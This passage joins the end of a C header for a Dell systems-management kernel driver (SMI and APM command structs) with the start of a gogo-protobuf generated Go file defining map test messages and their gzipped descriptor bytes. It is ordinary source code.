.attr = { .name = __stringify(_name), \
.mode = 0600 }, \
.read = _name##_read, \
.write = _name##_write, \
}
struct smi_cmd {
__u32 magic;
__u32 ebx;
__u32 ecx;
__u16 command_address;
__u8 command_code;
__u8 reserved;
__u8 command_buffer[1];
} __attribute__ ((packed));
struct apm_cmd {
__u8 command;
__s8 status;
__u16 reserved;
union {
struct {
__u8 parm[MAX_SYSMGMT_SHORTCMD_PARMBUF_LEN];
} __attribute__ ((packed)) shortreq;
struct {
__u16 num_sg_entries;
struct {
__u32 size;
__u64 addr;
} __attribute__ ((packed))
sglist[MAX_SYSMGMT_LONGCMD_SGENTRY_NUM];
} __attribute__ ((packed)) longreq;
} __attribute__ ((packed)) parameters;
} __attribute__ ((packed));
int dcdbas_smi_request(struct smi_cmd *smi_cmd);
struct smm_eps_table {
char smm_comm_buff_anchor[4];
u8 length;
u8 checksum;
u8 version;
u64 smm_comm_buff_addr;
u64 num_of_4k_pages;
} __packed;
#endif /* _DCDBAS_H_ */
| {
"pile_set_name": "Github"
} |
// Code generated by protoc-gen-gogo. DO NOT EDIT.
// source: combos/both/map.proto
/*
Package mapdefaults is a generated protocol buffer package.
It is generated from these files:
combos/both/map.proto
It has these top-level messages:
MapTest
FakeMap
FakeMapEntry
*/
package mapdefaults
import proto "github.com/gogo/protobuf/proto"
import fmt "fmt"
import math "math"
import _ "github.com/gogo/protobuf/gogoproto"
import github_com_gogo_protobuf_protoc_gen_gogo_descriptor "github.com/gogo/protobuf/protoc-gen-gogo/descriptor"
import github_com_gogo_protobuf_proto "github.com/gogo/protobuf/proto"
import compress_gzip "compress/gzip"
import bytes "bytes"
import io_ioutil "io/ioutil"
import strings "strings"
import reflect "reflect"
import github_com_gogo_protobuf_sortkeys "github.com/gogo/protobuf/sortkeys"
import io "io"
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.GoGoProtoPackageIsVersion2 // please upgrade the proto package
type MapTest struct {
StrStr map[string]string `protobuf:"bytes,1,rep,name=str_str,json=strStr" json:"str_str,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
}
func (m *MapTest) Reset() { *m = MapTest{} }
func (*MapTest) ProtoMessage() {}
func (*MapTest) Descriptor() ([]byte, []int) { return fileDescriptorMap, []int{0} }
type FakeMap struct {
Entries []*FakeMapEntry `protobuf:"bytes,1,rep,name=entries" json:"entries,omitempty"`
}
func (m *FakeMap) Reset() { *m = FakeMap{} }
func (*FakeMap) ProtoMessage() {}
func (*FakeMap) Descriptor() ([]byte, []int) { return fileDescriptorMap, []int{1} }
type FakeMapEntry struct {
Key string `protobuf:"bytes,1,opt,name=key,proto3" json:"key,omitempty"`
Value string `protobuf:"bytes,2,opt,name=value,proto3" json:"value,omitempty"`
Other string `protobuf:"bytes,3,opt,name=other,proto3" json:"other,omitempty"`
}
func (m *FakeMapEntry) Reset() { *m = FakeMapEntry{} }
func (*FakeMapEntry) ProtoMessage() {}
func (*FakeMapEntry) Descriptor() ([]byte, []int) { return fileDescriptorMap, []int{2} }
func init() {
proto.RegisterType((*MapTest)(nil), "mapdefaults.MapTest")
proto.RegisterType((*FakeMap)(nil), "mapdefaults.FakeMap")
proto.RegisterType((*FakeMapEntry)(nil), "mapdefaults.FakeMapEntry")
}
func (this *MapTest) Description() (desc *github_com_gogo_protobuf_protoc_gen_gogo_descriptor.FileDescriptorSet) {
return MapDescription()
}
func (this *FakeMap) Description() (desc *github_com_gogo_protobuf_protoc_gen_gogo_descriptor.FileDescriptorSet) {
return MapDescription()
}
func (this *FakeMapEntry) Description() (desc *github_com_gogo_protobuf_protoc_gen_gogo_descriptor.FileDescriptorSet) {
return MapDescription()
}
func MapDescription() (desc *github_com_gogo_protobuf_protoc_gen_gogo_descriptor.FileDescriptorSet) {
d := &github_com_gogo_protobuf_protoc_gen_gogo_descriptor.FileDescriptorSet{}
var gzipped = []byte{
// 3834 bytes of a gzipped FileDescriptorSet
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xc4, 0x5a, 0x5d, 0x70, 0x1b, 0xd7,
0x75, 0xe6, 0xe2, 0x87, 0x04, 0x0e, 0x40, 0x70, 0xb9, 0xa4, 0x24, 0x88, 0x89, 0x21, 0x0a, 0xfe,
0xa3, 0xed, 0x06, 0xcc, 0x48, 0x96, 0x2c, 0x41, 0x8d, 0x5d, 0x10, 0x84, 0x18, 0xa8, 0x24, 0x81,
0x2c, 0xc8, 0x58, 0x4e, 0x1f, 0x76, 0x96, 0x8b, 0x0b, 0x60, 0xa5, 0xc5, 0xee, 0x66, 0x77, 0x21,
0x99, 0x9a, 0xce, 0x54, 0x1d, 0xf7, 0x67, 0x32, 0x9d, 0xfe, 0x77, 0xa6, 0x89, 0xeb, 0xb8, 0x6d,
0x66, 0x5a, 0xa7, 0x49, 0x7f, 0x9c, 0xa6, 0x4d, 0xd3, 0x3e, 0xf5, 0x25, 0xad, 0x9f, 0x3a, 0xc9,
0x5b, 0x1f, 0xfa, 0x60, 0xb1, 0x9e, 0x69, 0xda, 0xba, 0xad, 0xdb, 0xf8, 0x21, 0x33, 0x7e, 0xe9,
0xdc, 0xbf, 0xc5, 0x2e, 0x00, 0x6a, 0xc1, 0xcc, 0xd8, 0x79, 0x22, 0xef, 0xb9, 0xe7, 0xfb, 0xee,
0xb9, 0xe7, 0x9e, 0x7b, 0xcf, 0xb9, 0x17, 0x0b, 0x5f, 0xbf, 0x02, 0xab, 0x5d, 0xcb, 0xea, 0x1a,
0x68, 0xdd, 0x76, 0x2c, 0xcf, 0x3a, 0x18, 0x74, 0xd6, 0xdb, 0xc8, 0xd5, 0x1c, 0xdd, 0xf6, 0x2c,
0xa7, 0x44, 0x64, 0xd2, 0x02, 0xd5, 0x28, 0x71, 0x8d, 0xe2, 0x0e, 0x2c, 0x5e, 0xd7, 0x0d, 0xb4,
0xe9, 0x2b, 0xb6, 0x90, 0x27, 0x5d, 0x81, 0x44, 0x47, 0x37, 0x50, 0x5e, 0x58, 0x8d, 0xaf, 0x65,
0x2e, 0x3c, 0x56, 0x1a, 0x01, 0x95, 0xc2, 0x88, 0x26, 0x16, 0xcb, 0x04, 0x51, 0x7c, 0x27, 0x01,
0x4b, 0x13, 0x7a, 0x25, 0x09, 0x12, 0xa6, 0xda, 0xc7, 0x8c, 0xc2, 0x5a, 0x5a, 0x26, 0xff, 0x4b,
0x79, 0x98, 0xb3, 0x55, 0xed, 0xb6, 0xda, 0x45, 0xf9, 0x18, 0x11, 0xf3, 0xa6, 0x54, 0x00, 0x68,
0x23, 0x1b, 0x99, 0x6d, 0x64, 0x6a, 0x87, 0xf9, 0xf8, 0x6a, 0x7c, 0x2d, 0x2d, 0x07, 0x24, 0xd2,
0x33, 0xb0, 0x68, 0x0f, 0x0e, 0x0c, 0x5d, 0x53, 0x02, 0x6a, 0xb0, 0x1a, 0x5f, 0x4b, 0xca, 0x22,
0xed, 0xd8, 0x1c, 0x2a, 0x3f, 0x09, 0x0b, 0x77, 0x91, 0x7a, 0x3b, 0xa8, 0x9a, 0x21, 0xaa, 0x39,
0x2c, 0x0e, 0x28, 0x56, 0x21, 0xdb, 0x47, 0xae, 0xab, 0x76, 0x91, 0xe2, 0x1d, 0xda, 0x28, 0x9f,
0x20, 0xb3, 0x5f, 0x1d, 0x9b, 0xfd, 0xe8, 0xcc, 0x33, 0x0c, 0xb5, 0x77, 0x68, 0x23, 0xa9, 0x02,
0x69, 0x64, 0x0e, 0xfa, 0x94, 0x21, 0x79, 0x8c, 0xff, 0x6a, 0xe6, 0xa0, 0x3f, 0xca, 0x92, 0xc2,
0x30, 0x46, 0x31, 0xe7, 0x22, 0xe7, 0x8e, 0xae, 0xa1, 0xfc, 0x2c, 0x21, 0x78, 0x72, 0x8c, 0xa0,
0x45, 0xfb, 0x47, 0x39, 0x38, 0x4e, 0xaa, 0x42, 0x1a, 0xbd, 0xec, 0x21, 0xd3, 0xd5, 0x2d, 0x33,
0x3f, 0x47, 0x48, 0x1e, 0x9f, 0xb0, 0x8a, 0xc8, 0x68, 0x8f, 0x52, 0x0c, 0x71, 0xd2, 0x65, 0x98,
0xb3, 0x6c, 0x4f, 0xb7, 0x4c, 0x37, 0x9f, 0x5a, 0x15, 0xd6, 0x32, 0x17, 0x3e, 0x3e, 0x31, 0x10,
0x1a, 0x54, 0x47, 0xe6, 0xca, 0x52, 0x1d, 0x44, 0xd7, 0x1a, 0x38, 0x1a, 0x52, 0x34, 0xab, 0x8d,
0x14, 0xdd, 0xec, 0x58, 0xf9, 0x34, 0x21, 0x38, 0x37, 0x3e, 0x11, 0xa2, 0x58, 0xb5, 0xda, 0xa8,
0x6e, 0x76, 0x2c, 0x39, 0xe7, 0x86, 0xda, 0xd2, 0x69, 0x98, 0x75, 0x0f, 0x4d, 0x4f, 0x7d, 0x39,
0x9f, 0x25, 0x11, 0xc2, 0x5a, 0xc5, 0xbf, 0x9d, 0x85, 0x85, 0x69, 0x42, 0xec, 0x1a, 0x24, 0x3b,
0x78, 0x96, 0xf9, 0xd8, 0x49, 0x7c, 0x40, 0x31, 0x61, 0x27, 0xce, 0xfe, 0x88, 0x4e, 0xac, 0x40,
0xc6, 0x44, 0xae, 0x87, 0xda, 0x34, 0x22, 0xe2, 0x53, 0xc6, 0x14, 0x50, 0xd0, 0x78, 0x48, 0x25,
0x7e, 0xa4, 0x90, 0xba, 0x09, 0x0b, 0xbe, 0x49, 0x8a, 0xa3, 0x9a, 0x5d, 0x1e, 0x9b, 0xeb, 0x51,
0x96, 0x94, 0x6a, 0x1c, 0x27, 0x63, 0x98, 0x9c, 0x43, 0xa1, 0xb6, 0xb4, 0x09, 0x60, 0x99, 0xc8,
0xea, 0x28, 0x6d, 0xa4, 0x19, 0xf9, 0xd4, 0x31, 0x5e, 0x6a, 0x60, 0x95, 0x31, 0x2f, 0x59, 0x54,
0xaa, 0x19, 0xd2, 0xd5, 0x61, 0xa8, 0xcd, 0x1d, 0x13, 0x29, 0x3b, 0x74, 0x93, 0x8d, 0x45, 0xdb,
0x3e, 0xe4, 0x1c, 0x84, 0xe3, 0x1e, 0xb5, 0xd9, 0xcc, 0xd2, 0xc4, 0x88, 0x52, 0xe4, 0xcc, 0x64,
0x06, 0xa3, 0x13, 0x9b, 0x77, 0x82, 0x4d, 0xe9, 0x51, 0xf0, 0x05, 0x0a, 0x09, 0x2b, 0x20, 0xa7,
0x50, 0x96, 0x0b, 0x77, 0xd5, 0x3e, 0x5a, 0xb9, 0x07, 0xb9, 0xb0, 0x7b, 0xa4, 0x65, 0x48, 0xba,
0x9e, 0xea, 0x78, 0x24, 0x0a, 0x93, 0x32, 0x6d, 0x48, 0x22, 0xc4, 0x91, 0xd9, 0x26, 0xa7, 0x5c,
0x52, 0xc6, 0xff, 0x4a, 0x3f, 0x35, 0x9c, 0x70, 0x9c, 0x4c, 0xf8, 0x89, 0xf1, 0x15, 0x0d, 0x31,
0x8f, 0xce, 0x7b, 0xe5, 0x39, 0x98, 0x0f, 0x4d, 0x60, 0xda, 0xa1, 0x8b, 0x3f, 0x0b, 0xa7, 0x26,
0x52, 0x4b, 0x37, 0x61, 0x79, 0x60, 0xea, 0xa6, 0x87, 0x1c, 0xdb, 0x41, 0x38, 0x62, 0xe9, 0x50,
0xf9, 0x7f, 0x9b, 0x3b, 0x26, 0xe6, 0xf6, 0x83, 0xda, 0x94, 0x45, 0x5e, 0x1a, 0x8c, 0x0b, 0x9f,
0x4e, 0xa7, 0xbe, 0x3f, 0x27, 0xde, 0xbf, 0x7f, 0xff, 0x7e, 0xac, 0xf8, 0xc5, 0x59, 0x58, 0x9e,
0xb4, 0x67, 0x26, 0x6e, 0xdf, 0xd3, 0x30, 0x6b, 0x0e, 0xfa, 0x07, 0xc8, 0x21, 0x4e, 0x4a, 0xca,
0xac, 0x25, 0x55, 0x20, 0x69, 0xa8, 0x07, 0xc8, 0xc8, 0x27, 0x56, 0x85, 0xb5, 0xdc, 0x85, 0x67,
0xa6, 0xda, 0x95, 0xa5, 0x6d, 0x0c, 0x91, 0x29, 0x52, 0x7a, 0x1e, 0x12, 0xec, 0x88, 0xc6, 0x0c,
0x4f, 0x4f, 0xc7, 0x80, 0xf7, 0x92, 0x4c, 0x70, 0xd2, 0xc7, 0x20, 0x8d, 0xff, 0xd2, 0xd8, 0x98,
0x25, 0x36, 0xa7, 0xb0, 0x00, 0xc7, 0x85, 0xb4, 0x02, 0x29, 0xb2, 0x4d, 0xda, 0x88, 0xa7, 0x36,
0xbf, 0x8d, 0x03, 0xab, 0x8d, 0x3a, 0xea, 0xc0, 0xf0, 0x94, 0x3b, 0xaa, 0x31, 0x40, 0x24, 0xe0,
0xd3, 0x72, 0x96, 0x09, 0x3f, 0x8b, 0x65, 0xd2, 0x39, 0xc8, 0xd0, 0x5d, 0xa5, 0x9b, 0x6d, 0xf4,
0x32, 0x39, 0x3d, 0x93, 0x32, 0xdd, 0x68, 0x75, 0x2c, 0xc1, 0xc3, 0xdf, 0x72, 0x2d, 0x93, 0x87,
0x26, 0x19, 0x02, 0x0b, 0xc8, 0xf0, 0xcf, 0x8d, 0x1e, 0xdc, 0x8f, 0x4c, 0x9e, 0xde, 0x68, 0x4c,
0x15, 0xbf, 0x15, 0x83, 0x04, 0x39, 0x2f, 0x16, 0x20, 0xb3, 0xf7, 0x52, 0xb3, 0xa6, 0x6c, 0x36,
0xf6, 0x37, 0xb6, 0x6b, 0xa2, 0x20, 0xe5, 0x00, 0x88, 0xe0, 0xfa, 0x76, 0xa3, 0xb2, 0x27, 0xc6,
0xfc, 0x76, 0x7d, 0x77, 0xef, 0xf2, 0xb3, 0x62, 0xdc, 0x07, 0xec, 0x53, 0x41, 0x22, 0xa8, 0x70,
0xf1, 0x82, 0x98, 0x94, 0x44, 0xc8, 0x52, 0x82, 0xfa, 0xcd, 0xda, 0xe6, 0xe5, 0x67, 0xc5, 0xd9,
0xb0, 0xe4, 0xe2, 0x05, 0x71, 0x4e, 0x9a, 0x87, 0x34, 0x91, 0x6c, 0x34, 0x1a, 0xdb, 0x62, 0xca,
0xe7, 0x6c, 0xed, 0xc9, 0xf5, 0xdd, 0x2d, 0x31, 0xed, 0x73, 0x6e, 0xc9, 0x8d, 0xfd, 0xa6, 0x08,
0x3e, 0xc3, 0x4e, 0xad, 0xd5, 0xaa, 0x6c, 0xd5, 0xc4, 0x8c, 0xaf, 0xb1, 0xf1, 0xd2, 0x5e, 0xad,
0x25, 0x66, 0x43, 0x66, 0x5d, 0xbc, 0x20, 0xce, 0xfb, 0x43, 0xd4, 0x76, 0xf7, 0x77, 0xc4, 0x9c,
0xb4, 0x08, 0xf3, 0x74, 0x08, 0x6e, 0xc4, 0xc2, 0x88, 0xe8, 0xf2, 0xb3, 0xa2, 0x38, 0x34, 0x84,
0xb2, 0x2c, 0x86, 0x04, 0x97, 0x9f, 0x15, 0xa5, 0x62, 0x15, 0x92, 0x24, 0xba, 0x24, 0x09, 0x72,
0xdb, 0x95, 0x8d, 0xda, 0xb6, 0xd2, 0x68, 0xee, 0xd5, 0x1b, 0xbb, 0x95, 0x6d, 0x51, 0x18, 0xca,
0xe4, 0xda, 0x67, 0xf6, 0xeb, 0x72, 0x6d, 0x53, 0x8c, 0x05, 0x65, 0xcd, 0x5a, 0x65, 0xaf, 0xb6,
0x29, 0xc6, 0x8b, 0x1a, 0x2c, 0x4f, 0x3a, 0x27, 0x27, 0xee, 0x8c, 0xc0, 0x12, 0xc7, 0x8e, 0x59,
0x62, 0xc2, 0x35, 0xb6, 0xc4, 0x5f, 0x11, 0x60, 0x69, 0x42, 0xae, 0x98, 0x38, 0xc8, 0x0b, 0x90,
0xa4, 0x21, 0x4a, 0xb3, 0xe7, 0x53, 0x13, 0x93, 0x0e, 0x09, 0xd8, 0xb1, 0x0c, 0x4a, 0x70, 0xc1,
0x0a, 0x22, 0x7e, 0x4c, 0x05, 0x81, 0x29, 0xc6, 0x8c, 0x7c, 0x45, 0x80, 0xfc, 0x71, 0xdc, 0x11,
0x07, 0x45, 0x2c, 0x74, 0x50, 0x5c, 0x1b, 0x35, 0xe0, 0xfc, 0xf1, 0x73, 0x18, 0xb3, 0xe2, 0x0d,
0x01, 0x4e, 0x4f, 0x2e, 0xb4, 0x26, 0xda, 0xf0, 0x3c, 0xcc, 0xf6, 0x91, 0xd7, 0xb3, 0x78, 0xb1,
0xf1, 0xc4, 0x84, 0x14, 0x86, 0xbb, 0x47, 0x7d, 0xc5, 0x50, 0xc1, 0x1c, 0x18, 0x3f, 0xae, 0x5a,
0xa2, 0xd6, 0x8c, 0x59, 0xfa, 0x85, 0x18, 0x9c, 0x9a, 0x48, 0x3e, 0xd1, 0xd0, 0x47, 0x00, 0x74,
0xd3, 0x1e, 0x78, 0xb4, 0xa0, 0xa0, 0xe7, 0x53, 0x9a, 0x48, 0xc8, 0xde, 0xc7, 0x67, 0xcf, 0xc0,
0xf3, 0xfb, 0xe3, 0xa4, 0x1f, 0xa8, 0x88, 0x28, 0x5c, 0x19, 0x1a, 0x9a, 0x20, 0x86, 0x16, 0x8e,
0x99, 0xe9, 0x58, 0xae, 0xfe, 0x24, 0x88, 0x9a, 0xa1, 0x23, 0xd3, 0x53, 0x5c, 0xcf, 0x41, 0x6a,
0x5f, 0x37, 0xbb, 0xe4, 0x00, 0x4e, 0x95, 0x93, 0x1d, 0xd5, 0x70, 0x91, 0xbc, 0x40, 0xbb, 0x5b,
0xbc, 0x17, 0x23, 0x48, 0x8e, 0x73, 0x02, 0x88, 0xd9, 0x10, 0x82, 0x76, 0xfb, 0x88, 0xe2, 0x37,
0x53, 0x90, 0x09, 0x94, 0xa5, 0xd2, 0x79, 0xc8, 0xde, 0x52, 0xef, 0xa8, 0x0a, 0xbf, 0x6a, 0x50,
0x4f, 0x64, 0xb0, 0xac, 0xc9, 0xae, 0x1b, 0x9f, 0x84, 0x65, 0xa2, 0x62, 0x0d, 0x3c, 0xe4, 0x28,
0x9a, 0xa1, 0xba, 0x2e, 0x71, 0x5a, 0x8a, 0xa8, 0x4a, 0xb8, 0xaf, 0x81, 0xbb, 0xaa, 0xbc, 0x47,
0xba, 0x04, 0x4b, 0x04, 0xd1, 0x1f, 0x18, 0x9e, 0x6e, 0x1b, 0x48, 0xc1, 0x97, 0x1f, 0x97, 0x1c,
0xc4, 0xbe, 0x65, 0x8b, 0x58, 0x63, 0x87, 0x29, 0x60, 0x8b, 0x5c, 0x69, 0x13, 0x1e, 0x21, 0xb0,
0x2e, 0x32, 0x91, 0xa3, 0x7a, 0x48, 0x41, 0x9f, 0x1f, 0xa8, 0x86, 0xab, 0xa8, 0x66, 0x5b, 0xe9,
0xa9, 0x6e, 0x2f, 0xbf, 0x8c, 0x09, 0x36, 0x62, 0x79, 0x41, 0x3e, 0x8b, 0x15, 0xb7, 0x98, 0x5e,
0x8d, 0xa8, 0x55, 0xcc, 0xf6, 0xa7, 0x55, 0xb7, 0x27, 0x95, 0xe1, 0x34, 0x61, 0x71, 0x3d, 0x47,
0x37, 0xbb, 0x8a, 0xd6, 0x43, 0xda, 0x6d, 0x65, 0xe0, 0x75, 0xae, 0xe4, 0x3f, 0x16, 0x1c, 0x9f,
0x58, 0xd8, 0x22, 0x3a, 0x55, 0xac, 0xb2, 0xef, 0x75, 0xae, 0x48, 0x2d, 0xc8, 0xe2, 0xc5, 0xe8,
0xeb, 0xf7, 0x90, 0xd2, 0xb1, 0x1c, 0x92, 0x59, 0x72, 0x13, 0x76, 0x76, 0xc0, 0x83, 0xa5, 0x06,
0x03, 0xec, 0x58, 0x6d, 0x54, 0x4e, 0xb6, 0x9a, 0xb5, 0xda, 0xa6, 0x9c, 0xe1, 0x2c, 0xd7, 0x2d,
0x07, 0x07, 0x54, 0xd7, 0xf2, 0x1d, 0x9c, 0xa1, 0x01, 0xd5, 0xb5, 0xb8, 0x7b, 0x2f, 0xc1, 0x92,
0xa6, 0xd1, 0x39, 0xeb, 0x9a, 0xc2, 0xae, 0x28, 0x6e, 0x5e, 0x0c, 0x39, 0x4b, 0xd3, 0xb6, 0xa8,
0x02, 0x8b, 0x71, 0x57, 0xba, 0x0a, 0xa7, 0x86, 0xce, 0x0a, 0x02, 0x17, 0xc7, 0x66, 0x39, 0x0a,
0xbd, 0x04, 0x4b, 0xf6, 0xe1, 0x38, 0x50, 0x0a, 0x8d, 0x68, 0x1f, 0x8e, 0xc2, 0x9e, 0x83, 0x65,
0xbb, 0x67, 0x8f, 0xe3, 0x96, 0x82, 0x38, 0xc9, 0xee, 0xd9, 0xa3, 0xc0, 0xc7, 0xc9, 0x7d, 0xd5,
0x41, 0x9a, 0xea, 0xa1, 0x76, 0xfe, 0x4c, 0x50, 0x3d, 0xd0, 0x21, 0xad, 0x83, 0xa8, 0x69, 0x0a,
0x32, 0xd5, 0x03, 0x03, 0x29, 0xaa, 0x83, 0x4c, 0xd5, 0xcd, 0x9f, 0x0b, 0x2a, 0xe7, 0x34, 0xad,
0x46, 0x7a, 0x2b, 0xa4, 0x53, 0x7a, 0x1a, 0x16, 0xad, 0x83, 0x5b, 0x1a, 0x0d, 0x49, 0xc5, 0x76,
0x50, 0x47, 0x7f, 0x39, 0xff, 0x18, 0xf1, 0xef, 0x02, 0xee, 0x20, 0x01, 0xd9, 0x24, 0x62, 0xe9,
0x29, 0x10, 0x35, 0xb7, 0xa7, 0x3a, 0x36, 0xa9, 0x09, 0x5c, 0x5b, 0xd5, 0x50, 0xfe, 0x71, 0xaa,
0x4a, 0xe5, 0xbb, 0x5c, 0x8c, 0xb7, 0x84, 0x7b, 0x57, 0xef, 0x78, 0x9c, 0xf1, 0x49, 0xba, 0x25,
0x88, 0x8c, 0xb1, 0xad, 0x81, 0x88, 0x5d, 0x11, 0x1a, 0x78, 0x8d, 0xa8, 0xe5, 0xec, 0x9e, 0x1d,
0x1c, 0xf7, 0x51, 0x98, 0xc7, 0x9a, 0xc3, 0x41, 0x9f, 0xa2, 0xf5, 0x8c, 0xdd, 0x0b, 0x8c, 0xf8,
0xa1, 0x95, 0x96, 0xc5, 0x32, 0x64, 0x83, 0xf1, 0x29, 0xa5, 0x81, 0x46, 0xa8, 0x28, 0xe0, 0x5c,
0x5f, 0x6d, 0x6c, 0xe2, 0x2c, 0xfd, 0xb9, 0x9a, 0x18, 0xc3, 0xd5, 0xc2, 0x76, 0x7d, 0xaf, 0xa6,
0xc8, 0xfb, 0xbb, 0x7b, 0xf5, 0x9d, 0x9a, 0x18, 0x0f, 0x96, 0xa5, 0xdf, 0x89, 0x41, 0x2e, 0x7c,
0xc3, 0x90, 0x7e, 0x12, 0xce, 0xf0, 0xe7, 0x00, 0x17, 0x79, 0xca, 0x5d, 0xdd, 0x21, 0x5b, 0xa6,
0xaf, 0xd2, 0x0a, 0xdb, 0x5f, 0xb4, 0x65, 0xa6, 0xd5, 0x42, 0xde, 0x8b, 0xba, 0x83, 0x37, 0x44,
0x5f, 0xf5, 0xa4, 0x6d, 0x38, 0x67, 0x5a, 0x8a, 0xeb, 0xa9, 0x66, 0x5b, 0x75, 0xda, 0xca, 0xf0,
0x21, 0x46, 0x51, 0x35, 0x0d, 0xb9, 0xae, 0x45, 0x53, 0x95, 0xcf, 0xf2, 0x71, 0xd3, 0x6a, 0x31,
0xe5, 0xe1, 0x19, 0x5e, 0x61, 0xaa, 0x23, 0x01, 0x16, 0x3f, 0x2e, 0xc0, 0x3e, 0x06, 0xe9, 0xbe,
0x6a, 0x2b, 0xc8, 0xf4, 0x9c, 0x43, 0x52, 0x57, 0xa6, 0xe4, 0x54, 0x5f, 0xb5, 0x6b, 0xb8, 0xfd,
0xd1, 0x94, 0xf7, 0xff, 0x12, 0x87, 0x6c, 0xb0, 0xb6, 0xc4, 0xa5, 0xba, 0x46, 0xf2, 0x88, 0x40,
0x4e, 0x9a, 0x47, 0x1f, 0x5a, 0x89, 0x96, 0xaa, 0x38, 0xc1, 0x94, 0x67, 0x69, 0xc5, 0x27, 0x53,
0x24, 0x4e, 0xee, 0xf8, 0x6c, 0x41, 0xf4, 0x16, 0x93, 0x92, 0x59, 0x4b, 0xda, 0x82, 0xd9, 0x5b,
0x2e, 0xe1, 0x9e, 0x25, 0xdc, 0x8f, 0x3d, 0x9c, 0xfb, 0x46, 0x8b, 0x90, 0xa7, 0x6f, 0xb4, 0x94,
0xdd, 0x86, 0xbc, 0x53, 0xd9, 0x96, 0x19, 0x5c, 0x3a, 0x0b, 0x09, 0x43, 0xbd, 0x77, 0x18, 0x4e,
0x45, 0x44, 0x34, 0xad, 0xe3, 0xcf, 0x42, 0xe2, 0x2e, 0x52, 0x6f, 0x87, 0x13, 0x00, 0x11, 0x7d,
0x88, 0xa1, 0xbf, 0x0e, 0x49, 0xe2, 0x2f, 0x09, 0x80, 0x79, 0x4c, 0x9c, 0x91, 0x52, 0x90, 0xa8,
0x36, 0x64, 0x1c, 0xfe, 0x22, 0x64, 0xa9, 0x54, 0x69, 0xd6, 0x6b, 0xd5, 0x9a, 0x18, 0x2b, 0x5e,
0x82, 0x59, 0xea, 0x04, 0xbc, 0x35, 0x7c, 0x37, 0x88, 0x33, 0xac, 0xc9, 0x38, 0x04, 0xde, 0xbb,
0xbf, 0xb3, 0x51, 0x93, 0xc5, 0x58, 0x70, 0x79, 0x5d, 0xc8, 0x06, 0xcb, 0xca, 0x8f, 0x26, 0xa6,
0xfe, 0x4e, 0x80, 0x4c, 0xa0, 0x4c, 0xc4, 0x05, 0x8a, 0x6a, 0x18, 0xd6, 0x5d, 0x45, 0x35, 0x74,
0xd5, 0x65, 0x41, 0x01, 0x44, 0x54, 0xc1, 0x92, 0x69, 0x17, 0xed, 0x23, 0x31, 0xfe, 0x75, 0x01,
0xc4, 0xd1, 0x12, 0x73, 0xc4, 0x40, 0xe1, 0xc7, 0x6a, 0xe0, 0x6b, 0x02, 0xe4, 0xc2, 0x75, 0xe5,
0x88, 0x79, 0xe7, 0x7f, 0xac, 0xe6, 0xbd, 0x1d, 0x83, 0xf9, 0x50, 0x35, 0x39, 0xad, 0x75, 0x9f,
0x87, 0x45, 0xbd, 0x8d, 0xfa, 0xb6, 0xe5, 0x21, 0x53, 0x3b, 0x54, 0x0c, 0x74, 0x07, 0x19, 0xf9,
0x22, 0x39, 0x28, 0xd6, 0x1f, 0x5e, 0xaf, 0x96, 0xea, 0x43, 0xdc, 0x36, 0x86, 0x95, 0x97, 0xea,
0x9b, 0xb5, 0x9d, 0x66, 0x63, 0xaf, 0xb6, 0x5b, 0x7d, 0x49, 0xd9, 0xdf, 0xfd, 0xe9, 0xdd, 0xc6,
0x8b, 0xbb, 0xb2, 0xa8, 0x8f, 0xa8, 0x7d, 0x88, 0x5b, 0xbd, 0x09, 0xe2, 0xa8, 0x51, 0xd2, 0x19,
0x98, 0x64, 0x96, 0x38, 0x23, 0x2d, 0xc1, 0xc2, 0x6e, 0x43, 0x69, 0xd5, 0x37, 0x6b, 0x4a, 0xed,
0xfa, 0xf5, 0x5a, 0x75, 0xaf, 0x45, 0x2f, 0xf0, 0xbe, 0xf6, 0x5e, 0x78, 0x53, 0xbf, 0x1a, 0x87,
0xa5, 0x09, 0x96, 0x48, 0x15, 0x76, 0x77, 0xa0, 0xd7, 0x99, 0x4f, 0x4c, 0x63, 0x7d, 0x09, 0xa7,
0xfc, 0xa6, 0xea, 0x78, 0xec, 0xaa, 0xf1, 0x14, 0x60, 0x2f, 0x99, 0x9e, 0xde, 0xd1, 0x91, 0xc3,
0xde, 0x3b, 0xe8, 0x85, 0x62, 0x61, 0x28, 0xa7, 0x4f, 0x1e, 0x3f, 0x01, 0x92, 0x6d, 0xb9, 0xba,
0xa7, 0xdf, 0x41, 0x8a, 0x6e, 0xf2, 0xc7, 0x11, 0x7c, 0xc1, 0x48, 0xc8, 0x22, 0xef, 0xa9, 0x9b,
0x9e, 0xaf, 0x6d, 0xa2, 0xae, 0x3a, 0xa2, 0x8d, 0x0f, 0xf0, 0xb8, 0x2c, 0xf2, 0x1e, 0x5f, 0xfb,
0x3c, 0x64, 0xdb, 0xd6, 0x00, 0x57, 0x5d, 0x54, 0x0f, 0xe7, 0x0b, 0x41, 0xce, 0x50, 0x99, 0xaf,
0xc2, 0xea, 0xe9, 0xe1, 0xab, 0x4c, 0x56, 0xce, 0x50, 0x19, 0x55, 0x79, 0x12, 0x16, 0xd4, 0x6e,
0xd7, 0xc1, 0xe4, 0x9c, 0x88, 0xde, 0x10, 0x72, 0xbe, 0x98, 0x28, 0xae, 0xdc, 0x80, 0x14, 0xf7,
0x03, 0x4e, 0xc9, 0xd8, 0x13, 0x8a, 0x4d, 0x5f, 0xe6, 0x62, 0x6b, 0x69, 0x39, 0x65, 0xf2, 0xce,
0xf3, 0x90, 0xd5, 0x5d, 0x65, 0xf8, 0xc8, 0x1c, 0x5b, 0x8d, 0xad, 0xa5, 0xe4, 0x8c, 0xee, 0xfa,
0x0f, 0x74, 0xc5, 0x37, 0x62, 0x90, 0x0b, 0x3f, 0x92, 0x4b, 0x9b, 0x90, 0x32, 0x2c, 0x4d, 0x25,
0xa1, 0x45, 0x7f, 0xa1, 0x59, 0x8b, 0x78, 0x57, 0x2f, 0x6d, 0x33, 0x7d, 0xd9, 0x47, 0xae, 0xfc,
0x93, 0x00, 0x29, 0x2e, 0x96, 0x4e, 0x43, 0xc2, 0x56, 0xbd, 0x1e, 0xa1, 0x4b, 0x6e, 0xc4, 0x44,
